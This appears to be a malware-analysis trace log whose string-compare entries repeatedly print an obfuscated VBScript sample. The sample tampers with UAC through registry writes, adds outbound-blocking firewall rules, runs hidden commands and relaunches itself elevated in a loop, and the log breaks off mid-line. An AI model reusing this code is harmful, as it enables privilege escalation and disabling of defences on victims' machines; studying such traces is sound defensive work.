bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.358] wcsncmp (_String1="(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.358] wcsncmp (_String1="\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.358] wcsncmp (_String1="CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.358] wcsncmp (_String1="DJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.358] wcsncmp (_String1="JDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 